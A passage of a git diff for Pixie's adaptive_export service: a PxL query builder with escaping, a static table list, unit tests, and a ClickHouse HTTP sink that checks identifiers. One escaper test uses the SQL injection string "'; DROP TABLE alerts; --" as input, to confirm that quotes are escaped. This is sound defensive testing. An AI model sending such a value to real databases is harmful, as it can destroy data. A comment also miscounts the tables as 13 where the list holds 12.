d.String() + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel index 80afa3f2875..242fff5e2a9 100644 --- a/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel +++ b/src/vizier/services/adaptive_export/internal/pxl/BUILD.bazel @@ -15,16 +15,29 @@ # SPDX-License-Identifier: Apache-2.0 load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") go_library( name = "pxl", - srcs = ["pxl.go"], + srcs = [ + "queryfor.go", + "tables.go", + ], importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/pxl", visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], deps = [ - "//src/api/go/pxapi", - "//src/api/go/pxapi/errdefs", - "//src/api/go/pxapi/types", - "@com_github_sirupsen_logrus//:logrus", + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "pxl_test", + srcs = [ + "queryfor_test.go", + "tables_test.go", + ], + embed = [":pxl"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", ], ) diff --git a/src/vizier/services/adaptive_export/internal/pxl/pxl.go b/src/vizier/services/adaptive_export/internal/pxl/pxl.go deleted file mode 100644 index e4e27a40b6b..00000000000 --- a/src/vizier/services/adaptive_export/internal/pxl/pxl.go +++ /dev/null @@ -1,80 +0,0 @@ -// Copyright 2018- The Pixie Authors. -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// -// SPDX-License-Identifier: Apache-2.0 - -package pxl - -import ( - "context" - "fmt" - - log "github.com/sirupsen/logrus" - "px.dev/pixie/src/api/go/pxapi" - "px.dev/pixie/src/api/go/pxapi/errdefs" - "px.dev/pixie/src/api/go/pxapi/types" -) - -// recordCounter counts the number of records received -type recordCounter struct { - count int -} - -func (r *recordCounter) HandleInit(ctx context.Context, metadata types.TableMetadata) error { - return nil -} - -func (r *recordCounter) HandleRecord(ctx context.Context, record *types.Record) error { - r.count++ - return nil -} - -func (r *recordCounter) HandleDone(ctx context.Context) error { - return nil -} - -type recordCounterMux struct { - counter *recordCounter -} - -func (m *recordCounterMux) AcceptTable(ctx context.Context, metadata types.TableMetadata) (pxapi.TableRecordHandler, error) { - return m.counter, nil -} - -// ExecuteScript executes a PxL script and returns the number of records returned -func ExecuteScript(ctx context.Context, client *pxapi.Client, clusterID string, pxl string) (int, error) { - vz, err := client.NewVizierClient(ctx, clusterID) - if err != nil { - return 0, fmt.Errorf("failed to create vizier client: %w", err) - } - - counter := &recordCounter{} - tm := &recordCounterMux{counter: counter} - - resultSet, err := vz.ExecuteScript(ctx, pxl, tm) - if err != nil { - return 0, fmt.Errorf("failed to execute script: %w", err) - } - defer resultSet.Close() - - if err := resultSet.Stream(); err != nil { - if errdefs.IsCompilationError(err) { - return 0, fmt.Errorf("PxL compilation error: %w", err) - } - return 0, fmt.Errorf("error streaming results: %w", err) - } - - log.Debugf("Script execution time: %v, bytes received: %v", resultSet.Stats().ExecutionTime, resultSet.Stats().TotalBytes) - return counter.count, nil -} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go new file mode 100644 index 00000000000..cd3053f8795 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor.go @@ -0,0 +1,80 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "fmt" + "strconv" + "strings" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrUnknownTable is returned by QueryFor for a table not in BuiltinTables. +var ErrUnknownTable = errors.New("pxl: unknown pixie table") + +// QueryFor returns a PxL script that selects rows from `table` for the +// (namespace, pod) of `t`, time-bounded to [sliceStart, sliceEnd). The +// `now` argument lets us compute a relative `start_time=` for +// px.DataFrame (PxL rejects ISO-string absolute bounds; we use a +// generously-padded relative bound and post-filter precisely with +// px.int64_to_time on the time_ column). +func QueryFor(table string, t anomaly.Target, sliceStart, sliceEnd, now time.Time) (string, error) { + if !IsBuiltin(table) { + return "", fmt.Errorf("%w: %q", ErrUnknownTable, table) + } + // pad covers (now - sliceStart) plus a 30s safety margin. When + // sliceStart is in the future (caller bug), now.Sub is negative and + // we'd ask pixie for a positive-only relative start; clamp to 30s. + pad := now.Sub(sliceStart) + 30*time.Second + if pad < 30*time.Second { + pad = 30 * time.Second + } + relStart := "-" + strconv.FormatInt(int64(pad/time.Second), 10) + "s" + + var b strings.Builder + b.WriteString("import px\n") + b.WriteString("df = px.DataFrame(table='" + table + "', start_time='" + relStart + "')\n") + b.WriteString("df = df[df.time_ >= px.int64_to_time(" + strconv.FormatInt(sliceStart.UnixNano(), 10) + ")]\n") + b.WriteString("df = df[df.time_ < px.int64_to_time(" + strconv.FormatInt(sliceEnd.UnixNano(), 10) + ")]\n") + b.WriteString("df.namespace = px.upid_to_namespace(df.upid)\n") + // px.upid_to_pod_name returns "/" (carnot: + // metadata_ops.h UPIDToPodNameUDF::Exec → absl::Substitute("$0/$1", ns, name)), + // not the bare pod name. Filtering against bare t.Pod would always + // miss; build the namespaced key when we have both fields. + b.WriteString("df.pod = px.upid_to_pod_name(df.upid)\n") + if t.Namespace != "" { + b.WriteString("df = df[df.namespace == '" + escapePxL(t.Namespace) + "']\n") + } + if t.Pod != "" { + podKey := t.Pod + if t.Namespace != "" { + podKey = t.Namespace + "/" + t.Pod + } + b.WriteString("df = df[df.pod == '" + escapePxL(podKey) + "']\n") + } + b.WriteString("px.display(df, '" + table + "')\n") + return b.String(), nil +} + +var pxlEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +func escapePxL(s string) string { + return pxlEscaper.Replace(s) +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go new file mode 100644 index 00000000000..e8bd7ca6c08 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/queryfor_test.go @@ -0,0 +1,222 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "errors" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// fixed reference time for deterministic relStart computation. +var ( + fixedNow = time.Date(2026, 5, 9, 15, 23, 44, 0, time.UTC) + fixedStart = fixedNow.Add(-5 * time.Minute) // ATTACK − 5 min + fixedEnd = fixedNow.Add(5 * time.Minute) // ATTACK + 5 min + target = anomaly.Target{ + PID: 12345, Comm: "redis-server", + Pod: "redis-6fbcfb97c-82qxv", Namespace: "redis", + } +) + +// TestQueryFor_UnknownTable — non-builtin tables wrap ErrUnknownTable. +func TestQueryFor_UnknownTable(t *testing.T) { + _, err := QueryFor("nope_table", target, fixedStart, fixedEnd, fixedNow) + if err == nil || !errors.Is(err, ErrUnknownTable) { + t.Fatalf("want ErrUnknownTable wrapper, got %v", err) + } + if !strings.Contains(err.Error(), `"nope_table"`) { + t.Fatalf("error must echo the bad table name; got %v", err) + } +} + +// TestQueryFor_NamespacedPodFilter — px.upid_to_pod_name returns +// "/" (verified in carnot's metadata_ops.h:387). The +// generated PxL must filter against the namespaced key when both +// fields are non-empty. +func TestQueryFor_NamespacedPodFilter(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantPodFilter := `df = df[df.pod == 'redis/redis-6fbcfb97c-82qxv']` + if !strings.Contains(q, wantPodFilter) { + t.Fatalf("expected pod filter %q in:\n%s", wantPodFilter, q) + } + wantNS := `df = df[df.namespace == 'redis']` + if !strings.Contains(q, wantNS) { + t.Fatalf("expected namespace filter %q in:\n%s", wantNS, q) + } +} + +// TestQueryFor_NamespaceOnly — only namespace filter when Pod is empty. +func TestQueryFor_NamespaceOnly(t *testing.T) { + tNoPod := anomaly.Target{Namespace: "redis"} + q, err := QueryFor("redis_events", tNoPod, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'redis']`) { + t.Fatalf("expected namespace filter; got:\n%s", q) + } + if strings.Contains(q, "df = df[df.pod ==") { + t.Fatalf("did not expect pod filter when Pod is empty; got:\n%s", q) + } +} + +// TestQueryFor_PodOnly — when Namespace is empty but Pod is set, fall +// back to a bare-pod filter (won't match in pixie since upid_to_pod_name +// always returns namespaced; documented as caller-shouldn't-do-this). +func TestQueryFor_PodOnly(t *testing.T) { + tNoNS := anomaly.Target{Pod: "redis-foo"} + q, err := QueryFor("redis_events", tNoNS, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.pod == 'redis-foo']`) { + t.Fatalf("expected bare pod filter; got:\n%s", q) + } + if strings.Contains(q, "df = df[df.namespace ==") { + t.Fatalf("did not expect namespace filter; got:\n%s", q) + } +} + +// TestQueryFor_NoTargetFilters — empty Target → no namespace OR pod +// filter (caller-driven coarse query). +func TestQueryFor_NoTargetFilters(t *testing.T) { + q, err := QueryFor("redis_events", anomaly.Target{}, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if strings.Contains(q, "df.namespace ==") || strings.Contains(q, "df.pod ==") { + t.Fatalf("expected no namespace/pod filter for empty Target; got:\n%s", q) + } +} + +// TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper — sliceStart +// is `>=`; sliceEnd is `<`. Encoded as nanos. +func TestQueryFor_TimeBoundsAreInclusiveLowerExclusiveUpper(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + wantLower := `df = df[df.time_ >= px.int64_to_time(1778339924000000000)]` // 15:18:44 UTC ns + wantUpper := `df = df[df.time_ < px.int64_to_time(1778340524000000000)]` // 15:28:44 UTC ns + if !strings.Contains(q, wantLower) { + t.Fatalf("expected lower bound %q in:\n%s", wantLower, q) + } + if !strings.Contains(q, wantUpper) { + t.Fatalf("expected upper bound %q in:\n%s", wantUpper, q) + } +} + +// TestQueryFor_RelativeStartTime — pad covers (now − sliceStart) plus +// 30 s. With ATTACK − 5min as sliceStart and now == ATTACK, pad is +// 5 min + 30 s = 330 s. +func TestQueryFor_RelativeStartTime(t *testing.T) { + q, err := QueryFor("redis_events", target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-330s'") { + t.Fatalf("expected start_time='-330s' in:\n%s", q) + } +} + +// TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture — caller-bug case; +// pad clamps to 30 s rather than emitting a positive (forward) start. +func TestQueryFor_PadFloorOn30sWhenSliceStartIsFuture(t *testing.T) { + futureStart := fixedNow.Add(1 * time.Minute) // sliceStart > now + q, err := QueryFor("redis_events", target, futureStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, "start_time='-30s'") { + t.Fatalf("expected start_time='-30s' clamp in:\n%s", q) + } +} + +// TestQueryFor_EscapesSingleQuoteInTarget — apostrophes in pod / +// namespace get backslash-escaped so they don't break out of the +// PxL string literal. +func TestQueryFor_EscapesSingleQuoteInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: "ns'with'quotes", Pod: "p'od"} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\'with\'quotes']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\'with\'quotes/p\'od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EscapesBackslashInTarget — backslashes too. Asserts +// both namespace and the namespaced pod-key forms are escaped, so a +// `Pod` containing `\` can't terminate the PxL string literal. +func TestQueryFor_EscapesBackslashInTarget(t *testing.T) { + tWeird := anomaly.Target{Namespace: `ns\back`, Pod: `p\od`} + q, err := QueryFor("redis_events", tWeird, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("QueryFor: %v", err) + } + if !strings.Contains(q, `df = df[df.namespace == 'ns\\back']`) { + t.Fatalf("expected escaped namespace; got:\n%s", q) + } + if !strings.Contains(q, `df = df[df.pod == 'ns\\back/p\\od']`) { + t.Fatalf("expected escaped namespaced pod key; got:\n%s", q) + } +} + +// TestQueryFor_EveryBuiltinTableEmits — smoke-test all known tables +// produce a syntactically-shaped PxL output (compile-not-tested). +func TestQueryFor_EveryBuiltinTableEmits(t *testing.T) { + for _, table := range Names(BuiltinTables) { + q, err := QueryFor(table, target, fixedStart, fixedEnd, fixedNow) + if err != nil { + t.Fatalf("table %s: %v", table, err) + } + if !strings.HasPrefix(q, "import px\n") { + t.Fatalf("table %s: expected import px header; got:\n%s", table, q) + } + if !strings.Contains(q, "px.display(df, '"+table+"')") { + t.Fatalf("table %s: expected px.display call with table name; got:\n%s", table, q) + } + } +} + +// TestEscapePxL_TableDriven — direct coverage of the escaper. +func TestEscapePxL_TableDriven(t *testing.T) { + cases := []struct{ in, want string }{ + {"", ""}, + {"plain", "plain"}, + {"o'malley", `o\'malley`}, + {`back\slash`, `back\\slash`}, + {`mix'and\back`, `mix\'and\\back`}, + {"'; DROP TABLE alerts; --", `\'; DROP TABLE alerts; --`}, + } + for _, c := range cases { + if got := escapePxL(c.in); got != c.want { + t.Errorf("escapePxL(%q) = %q, want %q", c.in, got, c.want) + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables.go b/src/vizier/services/adaptive_export/internal/pxl/tables.go new file mode 100644 index 00000000000..057a2cb57f0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables.go @@ -0,0 +1,110 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package pxl carries the strongly-typed list of pixie observation +// tables the adaptive-write feature targets, plus a stub Registry +// extension point for the future-PR work that lets users plug in their +// own tables alongside their UI-defined retention scripts. +// +// Importantly: the operator does NOT execute PxL itself in the current +// design. Pixie's retention plugin runs the user-defined PxL scripts +// and populates ClickHouse. This package is only used to: +// - enumerate the pixie tables the operator is aware of +// - keep a stable, named, audit-friendly set (no dynamic discovery) +// - declare the future Registry extension surface +package pxl + +// TableSpec is the strongly-typed identity of one pixie socket_tracer +// table the operator knows about. Bare-string identifiers are +// deliberately avoided in callers — TableSpec carries the table name +// today and is the natural place to attach future fields (column +// projections, retention TTLs, semantic tags) without breaking the API. +type TableSpec struct { + // Name is the ClickHouse / Pixie table name. Dotted names + // (e.g. "http2_messages.beta") are stored verbatim; backtick + // quoting is the responsibility of SQL emitters. + Name string + + // Protocol is the wire protocol the table observes. Documentary; + // helps an operator audit "which tables are about HTTP". + Protocol string +} + +// BuiltinTables enumerates the 13 pixie socket_tracer tables the +// adaptive-write feature is shipped with. The order is stable and +// matches the project's published documentation. Do NOT loop over +// dynamic discovery to populate this — strong static definition is +// the requirement. +var BuiltinTables = []TableSpec{ + {Name: "http_events", Protocol: "HTTP/1.x"}, + {Name: "http2_messages.beta", Protocol: "HTTP/2 + gRPC"}, + {Name: "dns_events", Protocol: "DNS"}, + {Name: "redis_events", Protocol: "Redis (RESP)"}, + {Name: "mysql_events", Protocol: "MySQL"}, + {Name: "pgsql_events", Protocol: "PostgreSQL"}, + {Name: "cql_events", Protocol: "Cassandra / CQL"}, + {Name: "mongodb_events", Protocol: "MongoDB"}, + {Name: "kafka_events.beta", Protocol: "Kafka"}, + {Name: "amqp_events", Protocol: "AMQP / RabbitMQ"}, + {Name: "mux_events", Protocol: "Mux (Twitter Finagle)"}, + {Name: "tls_events", Protocol: "TLS handshake"}, +} + +// Registry is the extension surface for users to register their own +// tables alongside the built-ins. STUB — not wired into the controller +// or main.go in this PR. The intended future shape is: +// +// ctlCfg.Registry = pxl.Compose(pxl.DefaultRegistry(), userRegistry) +// +// where Compose merges built-ins with user additions, and the +// controller iterates Registry.Tables() instead of BuiltinTables. +// +// Today the controller and main.go consume BuiltinTables directly. +// The future PR will plumb a Registry through controller.Config and +// rewrite the consumers. +type Registry interface { + Tables() []TableSpec +} + +// DefaultRegistry returns a Registry over BuiltinTables. Future-PR +// callers compose this with user-supplied registries. +func DefaultRegistry() Registry { return defaultRegistry{} } + +type defaultRegistry struct{} + +func (defaultRegistry) Tables() []TableSpec { return BuiltinTables } + +// Names projects a []TableSpec to a []string for legacy callers that +// take bare names. Useful at API boundaries that haven't been +// strong-typed yet (controller.Config.Tables is one). +func Names(specs []TableSpec) []string { + out := make([]string, len(specs)) + for i, s := range specs { + out[i] = s.Name + } + return out +} + +// IsBuiltin reports whether the given name is one of the built-in +// tables. Bare-string callers can use this as a defensive guard. +func IsBuiltin(name string) bool { + for _, t := range BuiltinTables { + if t.Name == name { + return true + } + } + return false +} diff --git a/src/vizier/services/adaptive_export/internal/pxl/tables_test.go b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go new file mode 100644 index 00000000000..bc6815190cf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/pxl/tables_test.go @@ -0,0 +1,96 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "testing" +) + +// TestBuiltinTables_Count — guard against accidental list churn. +// The set is the 12 socket_tracer tables in pixie's stirling layer +// (http_events, http2_messages.beta, dns_events, redis_events, +// mysql_events, pgsql_events, cql_events, mongodb_events, +// kafka_events.beta, amqp_events, mux_events, tls_events). Update +// this guard if the spec adds / removes a table. +func TestBuiltinTables_Count(t *testing.T) { + const want = 12 + if got := len(BuiltinTables); got != want { + t.Fatalf("BuiltinTables = %d entries, want %d", got, want) + } +} + +// TestBuiltinTables_AllNamesUnique — no duplicates. +func TestBuiltinTables_AllNamesUnique(t *testing.T) { + seen := map[string]bool{} + for _, sp := range BuiltinTables { + if seen[sp.Name] { + t.Fatalf("duplicate table %q in BuiltinTables", sp.Name) + } + seen[sp.Name] = true + } +} + +// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit +// queries like "which tables observe HTTP?" work without parsing the name. +func TestBuiltinTables_AllHaveProtocol(t *testing.T) { + for _, sp := range BuiltinTables { + if sp.Protocol == "" { + t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name) + } + } +} + +// TestIsBuiltin — defensive guard for bare-string callers. +func TestIsBuiltin(t *testing.T) { + if !IsBuiltin("redis_events") { + t.Fatalf("redis_events should be a builtin") + } + if !IsBuiltin("http2_messages.beta") { + t.Fatalf("dotted table http2_messages.beta should be a builtin") + } + if IsBuiltin("conn_stats") { + t.Fatalf("conn_stats is no longer in scope; should NOT be builtin") + } + if IsBuiltin("") { + t.Fatalf("empty string should not be builtin") + } +} + +// TestDefaultRegistry — stub returns BuiltinTables. +func TestDefaultRegistry(t *testing.T) { + r := DefaultRegistry() + got := r.Tables() + if len(got) != len(BuiltinTables) { + t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(BuiltinTables)) + } + for i, sp := range BuiltinTables { + if got[i] != sp { + t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp) + } + } +} + +// TestNames — projection to []string preserves order. +func TestNames(t *testing.T) { + names := Names(BuiltinTables) + if len(names) != len(BuiltinTables) { + t.Fatalf("Names len mismatch") + } + if names[0] != "http_events" { + t.Fatalf("first name = %q, want http_events", names[0]) + } +} diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel new file mode 100644 index 00000000000..70d6fa59d11 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "sink", + srcs = ["clickhouse.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "sink_test", + srcs = ["clickhouse_test.go"], + embed = [":sink"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go new file mode 100644 index 00000000000..322600a206a --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go @@ -0,0 +1,427 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package sink writes operator-owned rows to ClickHouse over the HTTP +// interface (default port 8123). It has two write surfaces: +// +// 1. forensic_db.adaptive_attribution — one row per arriving kubescape +// anomaly. ReplacingMergeTree(t_end) on the table side collapses +// re-inserts with the same (hostname, anomaly_hash) primary key +// into the row with the largest t_end. +// +// 2. forensic_db. — operator-pushed pixie observation rows +// (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true). +// Used when Pixie's cloud-side retention plugin can't reach an +// in-cluster CH endpoint; the operator queries pixie itself and +// writes the result with WritePixieRows. +package sink + +import ( + "bufio" + "bytes" + "context" + "encoding/json" + "fmt" + "io" + "net/http" + "net/url" + "regexp" + "strconv" + "strings" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf +// extensions like `http2_messages.beta`. Used to gate `table` strings +// before they're interpolated into the INSERT query. +var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`) + +// chIdentRE — strict CH identifier (no dots). Used to gate Database +// (and any future single-segment identifier) against SQL injection +// from env/config-driven values. +var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validateTableIdentifier(t string) error { + if !pixieTableIdentRE.MatchString(t) { + return fmt.Errorf("sink: invalid table identifier %q", t) + } + return nil +} + +// Config configures a ClickHouseHTTP sink. +type Config struct { + Endpoint string // e.g. http://clickhouse:8123 + Database string // defaults to "forensic_db" + Username string // optional basic auth + Password string // optional basic auth + Timeout time.Duration // per-write HTTP timeout; 0 → 30s +} + +// AttributionRow is one row of forensic_db.adaptive_attribution. +// All fields are required except LastRuleID. +type AttributionRow struct { + AnomalyHash anomaly.AnomalyHash + Namespace string // may be empty + Pod string // may be empty + Comm string + PID uint64 + Hostname string + TStart time.Time + TEnd time.Time + LastSeen time.Time + LastRuleID string + NAnomalies uint64 +} + +// ClickHouseHTTP is the production sink. +type ClickHouseHTTP struct { + cfg Config + client *http.Client +} + +// New validates Config + returns a ready-to-use sink. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Endpoint == "" { + return nil, fmt.Errorf("sink: empty Endpoint") + } + u, err := url.Parse(cfg.Endpoint) + if err != nil { + return nil, fmt.Errorf("sink: invalid Endpoint %q: %w", cfg.Endpoint, err) + } + if (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" { + return nil, fmt.Errorf("sink: Endpoint must be an absolute http(s) URL: %q", cfg.Endpoint) + } + // We append "/?query=…" downstream via string concatenation; if + // the configured Endpoint already carries a query or fragment, the + // concatenated URL is malformed (a second '?' becomes path data, + // fragments swallow trailing characters). Forbid both up-front. + if u.RawQuery != "" || u.Fragment != "" { + return nil, fmt.Errorf("sink: Endpoint must not include query parameters or a fragment: %q", cfg.Endpoint) + } + // Strip a trailing "/" from the path so downstream concatenation + // (Endpoint + "/?query=…") doesn't produce a "//?query=…" — some + // proxies / ingress controllers reject double-slashes. + cfg.Endpoint = strings.TrimRight(cfg.Endpoint, "/") + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + // Database is interpolated directly into INSERT/SELECT statements + // (used in WriteAttribution, WritePixieRows, QueryActive). Block + // injection via env/config-supplied values. + if !chIdentRE.MatchString(cfg.Database) { + return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + // http.Client.Timeout enforces only when >0; a negative value + // would silently disable the deadline. Reject explicitly so the + // "0 → 30s default" branch below is the only zero-handling path. + if cfg.Timeout < 0 { + return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout) + } + if cfg.Timeout == 0 { + cfg.Timeout = 30 * time.Second + } + return &ClickHouseHTTP{ + cfg: cfg, + client: &http.Client{Timeout: cfg.Timeout}, + }, nil +} + +// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row, +// keyed by column name) into forensic_db.
via FORMAT JSONEachRow. +// Used by the operator's per-anomaly fan-out path that queries pixie +// directly and pushes the resulting rows into CH (bypasses the cloud's +// retention plugin, which can't reach an in-cluster CH endpoint). +func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + if len(rows) == 0 { + return nil + } + if err := validateTableIdentifier(table); err != nil { + return err + } + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + return fmt.Errorf("sink: encode pixie row for %s: %w", table, err) + } + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + q := url.Values{} + q.Set("query", fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier)) + req, err := http.NewRequestWithContext(ctx, http.MethodPost, s.cfg.Endpoint+"/?"+q.Encode(), bytes.NewReader(buf.Bytes())) + if err != nil { + return err + } + req.Header.Set("Content-Type", "application/x-ndjson") + if s.cfg.Username != "" { + req.SetBasicAuth(s.cfg.Username, s.cfg.Password) + } + resp, err := s.client.Do(req) + if err != nil { + return fmt.Errorf("sink: pixie POST %s: %w", table, err) + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + // CH echoes failing rows back in the error body — would leak + // pixie traffic into operator logs. Drain (so the conn is + // reusable) but don't echo it. + _, _ = io.Copy(io.Discard, io.LimitReader(resp.Body, 4096)) + return fmt.Errorf("sink: pixie HTTP %d (%s)", resp.StatusCode, table) + } + return nil +} + +// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly +// shapes ClickHouse parses cleanly. time.Time → "YYYY-MM-DD HH:MM:SS.NNN…" +// (CH's DateTime64 input format); []byte → string; everything else → as-is. +func normalisePixieValue(v any) any { + switch x := v.(type) { + case time.Time: + return x.UTC().Format("2006-01-02 15:04:05.000000000") + case []byte: + return string(x) + default: + return v + } +} + +// Write upserts a batch of AttributionRows. 